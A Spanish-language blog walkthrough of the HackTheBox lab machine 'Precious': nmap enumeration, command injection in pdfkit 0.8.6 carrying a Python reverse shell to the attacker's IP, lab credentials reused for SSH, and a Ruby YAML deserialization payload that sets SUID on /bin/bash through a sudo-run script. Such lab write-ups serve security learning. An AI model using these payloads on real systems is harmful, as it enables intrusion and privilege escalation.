<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="google-translate-customization" content="108d9124921d80c3-80e20d618ff053c8-g4f02ec6f3dba68b7-c">
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HackTheBox Precious - Command injection y YAML deserialization | c4rta</title>
<meta name="generator" content="Jekyll v4.3.2">
<meta property="og:title" content="HackTheBox Precious - Command injection y YAML deserialization">
<meta name="author" content="c4rta">
<meta property="og:locale" content="en_US">
<meta name="description" content="Para la intrusion tenemos que la web genera PDFs usando pdfkit con una version vulnerable a Command Injection, la cual conduce a un RCE, para la escalada haremos un ataque YAML deserialization">
<meta property="og:description" content="Para la intrusion tenemos que la web genera PDFs usando pdfkit con una version vulnerable a Command Injection, la cual conduce a un RCE, para la escalada haremos un ataque YAML deserialization">
<link rel="canonical" href="https://ic4rta.github.io//hackthebox/2023/01/02/htb-precious.html">
<meta property="og:url" content="https://ic4rta.github.io//hackthebox/2023/01/02/htb-precious.html">
<meta property="og:site_name" content="c4rta">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2023-01-02T00:00:00+00:00">
<meta name="twitter:card" content="summary">
<meta property="twitter:title" content="HackTheBox Precious - Command injection y YAML deserialization">
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"c4rta"},"dateModified":"2023-01-02T00:00:00+00:00","datePublished":"2023-01-02T00:00:00+00:00","description":"Para la intrusion tenemos que la web genera PDFs usando pdfkit con una version vulnerable a Command Injection, la cual conduce a un RCE, para la escalada haremos un ataque YAML deserialization","headline":"HackTheBox Precious - Command injection y YAML deserialization","mainEntityOfPage":{"@type":"WebPage","@id":"https://ic4rta.github.io//hackthebox/2023/01/02/htb-precious.html"},"url":"https://ic4rta.github.io//hackthebox/2023/01/02/htb-precious.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="shortcut icon" href="/favicon.png">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-noto-sans@0.0.72/index.min.css">
  <link rel="stylesheet" href="/assets/css/main.css">
  <script src="/assets/js/main.js"></script>
  <link rel="stylesheet" href="/assets/css/syntax.css">
<link type="application/atom+xml" rel="alternate" href="https://ic4rta.github.io//feed.xml" title="c4rta">
<script>
  function initGoogleAnalytics() {
    var doNotTrack = (window.doNotTrack === "1" || navigator.doNotTrack === "1" ||
      navigator.doNotTrack === "yes" || navigator.msDoNotTrack === "1");
    var enableDNT = "true" == "true";

    if (!enableDNT || !doNotTrack) {
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

      ga('create', 'UA-212989441-1', 'auto');
      ga('send', 'pageview');
    }
  }
  window.addEventListener("load", initGoogleAnalytics);
</script>
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/default.min.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/highlight.min.js"></script>
<!-- and it's easy to individually load additional languages -->
<script charset="UTF-8" src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/languages/go.min.js"></script>




  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] #fff -->
  






  
      <!-- [function][get_value] #ff4e00 -->
  






  
      <!-- [function][get_value] uppercase -->
  

<script>
// Init highlight js
document.addEventListener('DOMContentLoaded', function(event) {
  var els = document.querySelectorAll('pre code')

  function addLangData(block) {
    var outer = block.parentElement.parentElement.parentElement;
    var lang = block.getAttribute('data-lang');
    for (var i = 0; i < outer.classList.length; i++) {
      var cls = outer.classList[i];
      if (cls.startsWith('language-')) {
        lang = cls;
        break;
      }
    }
    if (!lang) {
      cls = block.getAttribute('class');
      lang = cls ? cls.replace('hljs ', '') : '';
    }
    if (lang.startsWith('language-')) {
      lang = lang.substr(9);
    }
    block.setAttribute('class', 'hljs ' + lang);
    block.parentNode.setAttribute('data-lang', lang);
  }

  function addBadge(block) {
    var enabled = ('true' || 'true').toLowerCase();
    if (enabled == 'true') {
      var pre = block.parentElement;
      pre.classList.add('badge');
    }
  }

  function handle(block) {
    addLangData(block);
    addBadge(block)
    hljs.highlightBlock(block);
  }

  for (var i = 0; i < els.length; i++) {
    var el = els[i];
    handle(el);
  }
});
</script>

<style>
  /* code language badge */
  pre.badge::before {
    content: attr(data-lang);
    color: #fff;
    background-color: #ff4e00;
    padding: 0 .5em;
    border-radius: 0 2px;
    text-transform: uppercase;
    text-align: center;
    min-width: 32px;
    display: inline-block;
    position: absolute;
    right: 0;
  }

  /* fix wrong badge display for firefox browser */
  code > table pre::before {
    display: none;
  }
</style>

</head>
<body>




  
      <!-- [function][get_value] uppercase -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  










  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] true -->
  

<header class="site-header site-header-transparent" role="banner">

  <div class="wrapper">    
    <div class="site-header-inner">
<span class="site-brand"><a class="site-brand-inner" rel="author" href="/">
  <img class="site-favicon" title="c4rta" src="/favicon.png" onerror="this.style.display='none'">
  c4rta
</a>
</span><nav class="site-nav">
          <input type="checkbox" id="nav-trigger" class="nav-trigger">
          <label for="nav-trigger">
            <span class="menu-icon">
              <svg viewbox="0 0 18 15" width="18px" height="15px">
                <path d="M18,1.484c0,0.82-0.665,1.484-1.484,1.484H1.484C0.665,2.969,0,2.304,0,1.484l0,0C0,0.665,0.665,0,1.484,0 h15.032C17.335,0,18,0.665,18,1.484L18,1.484z M18,7.516C18,8.335,17.335,9,16.516,9H1.484C0.665,9,0,8.335,0,7.516l0,0 c0-0.82,0.665-1.484,1.484-1.484h15.032C17.335,6.031,18,6.696,18,7.516L18,7.516z M18,13.516C18,14.335,17.335,15,16.516,15H1.484 C0.665,15,0,14.335,0,13.516l0,0c0-0.82,0.665-1.483,1.484-1.483h15.032C17.335,12.031,18,12.695,18,13.516L18,13.516z"></path>
              </svg>
            </span>
          </label>      
          <div class="trigger">
<a class="page-link" href="/">Home</a><a class="page-link" href="/categories.html">Categorias</a><a class="page-link" href="/tags.html">Etiquetas</a><a class="page-link" href="/about.html">Sobre Mi</a><a class="page-link" href="https://github.com/ic4rta" target="_blank"><img src="https://img.shields.io/badge/github-%23121011.svg?style=for-the-badge&logo=github&logoColor=white" alt="GitHub"></a>
            <a class="page-link" href="http://twitter.com/_c4rta_" target="_blank"><img src="https://img.shields.io/badge/Twitter%20-%230077B5.svg?&style=for-the-badge&logo=Twitter&logoColor=white%22" alt="Twitter"></a>




  
      <!-- [function][get_value] [] -->
  

</div>
        </nav>
</div>
  </div>

</header>

<!-- 页面菜单栏 注释=固定/不注释=隐藏 -->

<script>
  function initHeader() {
    var lastScrollY = getScrollPos().y;
    var documentElement = document.documentElement;

    function storeScrollData() {
      var y = getScrollPos().y;documentElement.setAttribute("data-header-transparent", "");var scrollStatus = "";

      if (y <= 0) {
        scrollStatus = "top";
      } else if ((window.innerHeight + y) >= document.body.offsetHeight) {
        scrollStatus = "bottom";
      } else {
        var isScrollDown = (y - lastScrollY > 0) ? true : false;
        scrollStatus = isScrollDown ? "down" : "up";
      }

      lastScrollY = y;
      documentElement.setAttribute("data-scroll-status", scrollStatus);
    }

    window.addEventListener('scroll', function(e) {
      storeScrollData();
    });

    storeScrollData();
  }
  document.addEventListener('DOMContentLoaded', initHeader);
</script>

<!-- 页面菜单栏 注释=固定/不注释=隐藏 -->





  
      <!-- [function][get_value] [] -->
  






  
      <!-- [function][get_value] post-header.html -->
  






  
      <!-- [function][get_value] post-header.html -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] ./assets/images/home/home-t.png -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] #000 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 0.618 -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] 50vh -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] font-size: 2.25em; font-weight: bold;  -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value] color: gold -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value]  -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] true -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  






  
      <!-- [function][get_value] 0 -->
  





<style>
    html .page-banner {
      background: #000;
    }
  </style>
<style>html .page-banner {
      height:  18.4vh;
      min-height: 50vh;
    }
    html[data-scroll-status="top"] .page-banner {
      height: 50vh;
    }
  </style>
<style>
    html .page-banner .page-banner-img > *:first-child {
      opacity: 0.618;
    }

    html[data-theme="dark"] .page-banner .page-banner-img > *:first-child {
      opacity: 0.443724;
    }
  </style>
<style>
    html .page-banner .page-banner-inner > *:first-child > *:nth-child(1) {
      font-size: 2.25em; font-weight: bold; 
    }
  </style>
<style>
    html .page-banner .page-banner-inner > *:first-child > *:nth-child(2) {
      color: gold
    }
  </style>
<section class="page-banner">
    <div class="page-banner-img">
<div style="background-image: url(/assets/images/home/home-t.png)"></div>
        <img class="img-placeholder" src="/assets/images/home/home-t.png">
</div>
    <div class="wrapper">
      <div class="page-banner-inner">
<header class="post-header">
  <h1 class="post-title p-name" itemprop="name headline">HackTheBox Precious - Command injection y YAML deserialization</h1>
  <h2 class="post-subtitle"></h2>

  <p class="post-meta">
    <time class="dt-published" datetime="2023-01-02T00:00:00+00:00" itemprop="datePublished"><i class="fa fa-calendar"></i> Jan 02, 2023
    </time>

    
    

















  
      <!-- [function][get_article_words] 1288 -->
  
















    <span class="post-reading-time left-vsplit"><i class="fa fa-clock-o"></i> About 8 mins</span>
  </p>
<div class="post-tags">
<a class="post-tag" href="/tags.html#Command%20injection">#Command injection</a><a class="post-tag" href="/tags.html#YAML%20deserialization">#YAML deserialization</a>
</div></header>
</div>
    </div>
  </section><script>
  function hashLocate(hashValue) {
    hashValue = hashValue.replace(/^.*#h-/, '');
    hashValue = decodeURIComponent(hashValue);
    var element = document.getElementById(hashValue);

    if (!element) {
      return;
    }

    var header = document.querySelector('header.site-header');
    var headerRect = header.getBoundingClientRect();
    var headerTop = Math.floor(headerRect.top);
    var headerHeight = Math.floor(headerRect.height);
    var scrollPos = getScrollPos();
    var offsetY = element.offsetTop - (headerTop + headerHeight + 20);

    if (offsetY == scrollPos.y) {
      return;
    }

    if (headerTop == 0  && offsetY > scrollPos.y) {
      offsetY += headerHeight + 2;
    } else if (headerTop < 0  && offsetY < scrollPos.y) {
      offsetY -= headerHeight - 2;
    }

    smoothScrollTo(offsetY);
  }

  // The first event occurred
  window.addEventListener('load', function(event) {
    if (window.location.hash) {
      hashLocate(window.location.hash);
    }
  });

  // The first event occurred
  window.addEventListener('click', function(event) {
    if (event.target.tagName.toLowerCase() == 'a') {
      hashLocate(event.target.getAttribute('href'));
    }
  });
</script>
<div class="theme-toggle">
  <input type="checkbox" id="theme-switch">
  <label for="theme-switch">
    <div class="toggle"></div>
    <div class="names">
      <p class="light">Light</p>
      <p class="dark">Dark</p>
    </div>
  </label>
</div>




  
      <!-- [function][get_value] auto -->
  

<script>
  (function() {
    var sw = document.getElementById('theme-switch');
    var html = document.getElementsByTagName('html')[0];
    var nightModeOption = ('auto' || 'auto').toLowerCase();
    var storage = nightModeOption === 'manual'
        ? localStorage
        : sessionStorage;
    var themeData = loadThemeData();

    function saveThemeData(data) {
      storage.setItem('theme', JSON.stringify(data));
    }

    function loadThemeData() {
      var data = storage.getItem('theme');
      try {
        data = JSON.parse(data ? data : '');
      } catch(e) {
        data = { nightShift: undefined, autoToggleAt: 0 };
        saveThemeData(data);
      }
      return data;
    }

    function handleThemeToggle(nightShift) {
      themeData.nightShift = nightShift;
      saveThemeData(themeData);
      html.dataset.theme = nightShift ? 'dark' : 'light';
      setTimeout(function() {
        sw.checked = nightShift ? true : false;
      }, 50);
    }

    function autoThemeToggle() {
      // Next time point of theme toggle
      var now = new Date();
      var toggleAt = new Date();
      var hours = now.getHours();
      var nightShift = hours >= 19 || hours <=7;

      if (nightShift) {
        if (hours > 7) {
          toggleAt.setDate(toggleAt.getDate() + 1);
        }
        toggleAt.setHours(7);
      } else {
        toggleAt.setHours(19);
      }

      toggleAt.setMinutes(0);
      toggleAt.setSeconds(0);
      toggleAt.setMilliseconds(0)

      var delay = toggleAt.getTime() - now.getTime();

      // auto toggle theme mode
      setTimeout(function() {
        handleThemeToggle(!nightShift);
      }, delay);

      return {
        nightShift: nightShift,
        toggleAt: toggleAt.getTime()
      };
    }

    // Listen the theme toggle event
    sw.addEventListener('change', function(event) {
      handleThemeToggle(event.target.checked);
    });

    if (nightModeOption == 'auto') {
      var data = autoThemeToggle();

      // Toggle theme by local setting
      if (data.toggleAt > themeData.autoToggleAt) {
        themeData.autoToggleAt = data.toggleAt;
        handleThemeToggle(data.nightShift);
      } else {
        handleThemeToggle(themeData.nightShift);
      }
    } else if (nightModeOption == 'manual') {
      handleThemeToggle(themeData.nightShift);
    } else {
      var nightShift = themeData.nightShift;
      if (nightShift === undefined) {
        nightShift = nightModeOption === 'on';
      }
      handleThemeToggle(nightShift);
    }
  })();
</script>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <div class="framework">
  <section class="main">

     <div class="post">
  <section>




  
      <!-- [function][get_value] {"image"=>"./assets/images/home/home-t.png", "opacity"=>0.618, "background"=>"#000", "height"=>"50vh", "min_height"=>"50vh", "heading_style"=>"font-size: 2.25em; font-weight: bold; ", "subheading_style"=>"color: gold"} -->
  






  
      <!-- [function][get_value] [] -->
  

<article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

    <div class="post-content e-content" itemprop="articleBody">

      <p class="lead">Para la intrusion tenemos que la web genera PDFs usando pdfkit con una version vulnerable a Command Injection, la cual conduce a un RCE, para la escalada haremos un ataque YAML deserialization</p>

<h2 id="enumeracion">Enumeracion</h2>

<p>Iniciamos con un escaneo de nmap con el comando:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sS -n -Pn --open -p- 10.10.11.189
</code></pre></div></div>
<p>El cual le estamos diciendo que con:</p>

<ul>
  <li>
    <p>sS: haga un TCP SYN Scan el cual hace que el destino responda con un RST si el puerto esta cerrado, o con un SYN/ACK si esta abierto, y ademas para que vaya mas rapido</p>
  </li>
  <li>
    <p>n: para que no haga resolucion DNS y tarde menos el escaneo</p>
  </li>
  <li>
    <p>Pn: para evitar el descubrimiento de hosts</p>
  </li>
  <li>
    <p>open: para que solo muestre los puertos abiertos</p>
  </li>
  <li>
    <p>-p-: para que escanee todo el rango de puertos</p>
  </li>
</ul>

<p>Esto nos reportara 2 puertos abiertos:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</code></pre></div></div>

<p>Asi que ahora escanearemos para saber la version y servicio que esta corriendo por detras:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -sCV -p22,80 10.10.11.189
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Convert Web Page to PDF
| http-server-header: 
|   nginx/1.18.0
|_  nginx/1.18.0 + Phusion Passenger(R) 6.0.15
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>
<p>Tenemos el puerto de SSH abierto, pero aun no podemos hacer mucha cosa, y el puerto 80, el cual de primeras nos dice que podemos convertir una pagina web a un pdf: <code class="language-plaintext highlighter-rouge">http-title: Convert Web Page to PDF</code></p>

<p>Si nos dirigimos a la pagina web, podemos ver que esta esperando por una URL, asi que para comprobar que se puede convertir a PDF, iniciaremos un servidor web con python:</p>

<p><code class="language-plaintext highlighter-rouge">python3 -m http.server 8080</code></p>

<p>Y le pasaremos la URL</p>

<p><img src="/assets/img/precious/precious1.png" alt=""></p>

<p>Y efecto, convierte la pagina a un pdf, y me muestra el contenido de mi directorio /Desktop</p>

<p><img src="/assets/img/precious/precious2.png" alt=""></p>

<p>En este punto, una buena idea es ver un poco de los metadatos del pdf, usaremos la herramienta <code class="language-plaintext highlighter-rouge">exiftools</code> (aun que por alguna razon no me jala, asi que usare esta <a href="https://exif.tools/">web</a>)</p>

<p>Y podemos ver que para generarlo esta usando pdfkit:</p>

<p><img src="/assets/img/precious/precious3.png" alt=""></p>

<h2 id="command-injection">Command Injection</h2>

<p>La version de pdfkit que genero el pdf es la <code class="language-plaintext highlighter-rouge">v0.8.6</code>, asi que… Nunca es mala idea buscar si existe un exploit para la version de algo.</p>

<p>Econtre que esa version de vulnerable a <code class="language-plaintext highlighter-rouge">Command injection</code> a travez del parametro <code class="language-plaintext highlighter-rouge">name</code></p>

<p>Lee <a href="https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795">aqui</a> si quieres saber mas</p>

<p>Asi que intentare ejecutar el comando <code class="language-plaintext highlighter-rouge">whoami</code> para ver si funciona:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.14.102:8080/?name=%20`whoami`
</code></pre></div></div>

<p><img src="/assets/img/precious/precious4.png" alt=""></p>

<p>Y una vez sabiendo que si funciona, por lo tanto tenemos Remote Command Execution(RCE), nos mandaremos una reverse shell con python3:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python3</span> <span class="o">-</span><span class="n">c</span> <span class="sh">'</span><span class="s">import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((</span><span class="sh">"</span><span class="s">10.10.14.102</span><span class="sh">"</span><span class="s">,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(</span><span class="sh">"</span><span class="s">sh</span><span class="sh">"</span><span class="s">)</span><span class="sh">'</span>
</code></pre></div></div>

<p>Y la URL queda:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://10.10.14.102:8080/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.102",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`
</code></pre></div></div>
<p>Recuerda editar la IP por la que te dio HTB</p>

<h2 id="flag-de-user">Flag de user</h2>

<p>Al lista el contenido podemos ver varios directorios:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby@precious:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-lha</span>
<span class="nb">ls</span> <span class="nt">-lha</span>
total 28K
drwxr-xr-x 4 ruby ruby 4.0K Apr 10 16:46 <span class="nb">.</span>
drwxr-xr-x 4 root root 4.0K Oct 26 08:28 ..
lrwxrwxrwx 1 root root    9 Oct 26 07:53 .bash_history -&gt; /dev/null
<span class="nt">-rw-r--r--</span> 1 ruby ruby  220 Mar 27  2022 .bash_logout
<span class="nt">-rw-r--r--</span> 1 ruby ruby 3.5K Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4.0K Oct 26 08:28 .bundle
drwxr-xr-x 3 ruby ruby 4.0K Apr 10 16:46 .cache
<span class="nt">-rw-r--r--</span> 1 ruby ruby  807 Mar 27  2022 .profile
</code></pre></div></div>

<p>Navegando un poco, encontre que en el directorio <code class="language-plaintext highlighter-rouge">.bundle</code> hay un archivo de configuracion el cual tiene unas credenciales:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby@precious:~/.bundle<span class="nv">$ </span><span class="nb">cat </span>config
<span class="nb">cat </span>config
<span class="nt">---</span>
BUNDLE_HTTPS://RUBYGEMS__ORG/: <span class="s2">"henry:Q3c1AqGHtoI0aXAYFH"</span>
</code></pre></div></div>

<p>Y recordemos que tenemos el puerto del SSH abierto, asi que nos conectaremos por ssh con las credenciales que nos aparecen ahi.</p>

<p>usuario: henry</p>

<p>contraseña: Q3c1AqGHtoI0aXAYFH</p>

<p>Y ahora si ya podemos ver la flag de user:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>henry@precious:~<span class="nv">$ </span><span class="nb">cat </span>user.txt 
8cee1d827eb735217879ec75ce6d2751
</code></pre></div></div>

<h2 id="flag-de-root">Flag de root</h2>

<p>Primeramente ingresare el comando <code class="language-plaintext highlighter-rouge">sudo -l</code> para poder ver que podemos ejecutar como root desde el usuario <code class="language-plaintext highlighter-rouge">henry</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
</code></pre></div></div>

<p>Nos dice que podemos ejecutar el archivo <code class="language-plaintext highlighter-rouge">update_dependencies.rb</code></p>

<p>Asi que vamos a pasar a ver el contenido del archivo:</p>

<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Compare installed dependencies with those specified in "dependencies.yml"</span>
<span class="nb">require</span> <span class="s2">"yaml"</span>
<span class="nb">require</span> <span class="s1">'rubygems'</span>

<span class="c1"># TODO: update versions automatically</span>
<span class="k">def</span> <span class="nf">update_gems</span><span class="p">()</span>
<span class="k">end</span>

<span class="k">def</span> <span class="nf">list_from_file</span>
    <span class="no">YAML</span><span class="p">.</span><span class="nf">load</span><span class="p">(</span><span class="no">File</span><span class="p">.</span><span class="nf">read</span><span class="p">(</span><span class="s2">"dependencies.yml"</span><span class="p">))</span>
<span class="k">end</span>

<span class="k">def</span> <span class="nf">list_local_gems</span>
    <span class="no">Gem</span><span class="o">::</span><span class="no">Specification</span><span class="p">.</span><span class="nf">sort_by</span><span class="p">{</span> <span class="o">|</span><span class="n">g</span><span class="o">|</span> <span class="p">[</span><span class="n">g</span><span class="p">.</span><span class="nf">name</span><span class="p">.</span><span class="nf">downcase</span><span class="p">,</span> <span class="n">g</span><span class="p">.</span><span class="nf">version</span><span class="p">]</span> <span class="p">}.</span><span class="nf">map</span><span class="p">{</span><span class="o">|</span><span class="n">g</span><span class="o">|</span> <span class="p">[</span><span class="n">g</span><span class="p">.</span><span class="nf">name</span><span class="p">,</span> <span class="n">g</span><span class="p">.</span><span class="nf">version</span><span class="p">.</span><span class="nf">to_s</span><span class="p">]}</span>
<span class="k">end</span>

<span class="n">gems_file</span> <span class="o">=</span> <span class="n">list_from_file</span>
<span class="n">gems_local</span> <span class="o">=</span> <span class="n">list_local_gems</span>

<span class="n">gems_file</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">file_name</span><span class="p">,</span> <span class="n">file_version</span><span class="o">|</span>
    <span class="n">gems_local</span><span class="p">.</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">local_name</span><span class="p">,</span> <span class="n">local_version</span><span class="o">|</span>
        <span class="k">if</span><span class="p">(</span><span class="n">file_name</span> <span class="o">==</span> <span class="n">local_name</span><span class="p">)</span>
            <span class="k">if</span><span class="p">(</span><span class="n">file_version</span> <span class="o">!=</span> <span class="n">local_version</span><span class="p">)</span>
                <span class="nb">puts</span> <span class="s2">"Installed version differs from the one specified in file: "</span> <span class="o">+</span> <span class="n">local_name</span>
            <span class="k">else</span>
                <span class="nb">puts</span> <span class="s2">"Installed version is equals to the one specified in file: "</span> <span class="o">+</span> <span class="n">local_name</span>
            <span class="k">end</span>
        <span class="k">end</span>
    <span class="k">end</span>
<span class="k">end</span>
</code></pre></div></div>
<p>Me doy cuenta que esta intentando cargar un archivo que se llama <code class="language-plaintext highlighter-rouge">dependencies.yml</code>, el cual no se le esta indicando la ruta, es decir, que lo trata de cargar desde el directorio actual donde se encuentra el usuario, entonces… ¿Por que no crearlo?, y ademas esta usando la funcion <code class="language-plaintext highlighter-rouge">YAML.load()</code> la cual es vulnerable a un ataque<code class="language-plaintext highlighter-rouge">YAML deserialization</code> el cual deriva de un RCE, para saber como explotarlo nos guiaremos de <a href="https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml">aqui</a></p>

<p>Crearemos un archivo yml con el nombre <code class="language-plaintext highlighter-rouge">dependencies.yml</code> en el directorio actual, con el contenido:</p>

<div class="language-yml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">---</span>
<span class="pi">-</span> <span class="kt">!ruby/object:Gem::Installer</span>
    <span class="na">i</span><span class="pi">:</span> <span class="s">x</span>
<span class="pi">-</span> <span class="kt">!ruby/object:Gem::SpecFetcher</span>
    <span class="na">i</span><span class="pi">:</span> <span class="s">y</span>
<span class="pi">-</span> <span class="kt">!ruby/object:Gem::Requirement</span>
  <span class="na">requirements</span><span class="pi">:</span>
    <span class="kt">!ruby/object:Gem::Package::TarReader</span>
    <span class="na">io</span><span class="pi">:</span> <span class="nl">&amp;1</span> <span class="kt">!ruby/object:Net::BufferedIO</span>
      <span class="na">io</span><span class="pi">:</span> <span class="nl">&amp;1</span> <span class="kt">!ruby/object:Gem::Package::TarReader::Entry</span>
         <span class="na">read</span><span class="pi">:</span> <span class="m">0</span>
         <span class="na">header</span><span class="pi">:</span> <span class="s2">"</span><span class="s">abc"</span>
      <span class="na">debug_output</span><span class="pi">:</span> <span class="nl">&amp;1</span> <span class="kt">!ruby/object:Net::WriteAdapter</span>
         <span class="na">socket</span><span class="pi">:</span> <span class="nl">&amp;1</span> <span class="kt">!ruby/object:Gem::RequestSet</span>
             <span class="na">sets</span><span class="pi">:</span> <span class="kt">!ruby/object:Net::WriteAdapter</span>
                 <span class="na">socket</span><span class="pi">:</span> <span class="kt">!ruby/module</span> <span class="s1">'</span><span class="s">Kernel'</span>
                 <span class="na">method_id</span><span class="pi">:</span> <span class="s">:system</span>
             <span class="na">git_set</span><span class="pi">:</span> <span class="s2">"</span><span class="s">chmod</span><span class="nv"> </span><span class="s">+s</span><span class="nv"> </span><span class="s">/bin/bash"</span>
         <span class="na">method_id</span><span class="pi">:</span> <span class="s">:resolve</span>
</code></pre></div></div>

<p>Donde le estamos diciendo que ejecute el comando <code class="language-plaintext highlighter-rouge">chmod +s /bin/bash</code> que le asigna permisos SUID a /bin/bash</p>

<p>Y por ultimo ejecutamos el archivo:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo /usr/bin/ruby /opt/update_dependencies.rb
</code></pre></div></div>
